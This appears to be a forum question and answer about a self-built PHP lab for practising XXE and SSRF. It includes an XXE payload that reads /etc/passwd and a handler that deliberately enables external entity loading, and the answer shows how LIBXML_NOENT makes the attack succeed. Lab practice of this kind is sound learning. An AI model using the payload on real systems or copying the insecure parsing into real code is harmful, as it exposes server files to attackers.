# XXE SSRF Practice

Tags: xxe

I'm trying to implement a simple demo - to better understand XXE and SSRF techniques.
I have written these two files below in an attempt to set this up.

I currently intercept the AJAX POST request and modify the data (params) by appending:

```
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
```

*I have also tried another local file instead of `/etc/passwd`; as I wasn't sure if it due to the `www-data` can access the given file

I've read that PHP v8+ has patched the built-in parsers to not allow external entities by default.
Hence i tried adding the following; though I believe its deprecated -
libxml_disable_entity_loader(false);

Despite this, it seems like my XXE attempt is not working, and I'm not entirely sure why?

xxe.php -

```
<!DOCTYPE html>
<html>
<body>
<button type="button" onclick="postData()">Post data</button>
<br>
<br>

<script>
function postData(){
 var xHTTP = new XMLHttpRequest();
 var params = "<?xml version='1.0'?><entry><row>1</row><ex>a</ex><row>2</row><ex>b</ex></entry>";

 xHTTP.onreadystatechange = function(){
  if(this.readyState == 4){
   console.log(xHTTP.responseText);
  }
 };
 
 xHTTP.open("POST", '/xxe_post_handler.php', true);
 xHTTP.setRequestHeader("Content-Type", "application/xml");
 xHTTP.send(params);
}
</script>
</body>
</html>
```

xxe_post_handler.php -

```
<?php
libxml_disable_entity_loader(false);

if($_SERVER["REQUEST_METHOD"]=="POST"){
 $postData = trim(file_get_contents('php://input'));
 $xml = simplexml_load_string($postData);

 foreach($xml->children() as $child){
  printf("XML child: %s\n", $child);
 }

 $xmlDOM = new DOMDocument();
 $xmlDOM->loadXML($postData);

 $xD = $xmlDOM->documentElement;
 foreach($xD->childNodes AS $xN){
  print $xN->nodeName . " = " . $xN->nodeValue . "<br>";
 }
}
?>
```

[image]

Answer (score 1):

I have found thru a youtube tutorial the answer to my question
https://youtu.be/JI0daBHq6fA?t=145

The only modification done was to add these LIBXML_NOENT params to the loadXML function (file - xxe_post_handler.php).
https://www.php.net/manual/en/libxml.constants.php

E.g. -
$xmlDOM->loadXML($postData, LIBXML_NOENT);

[image]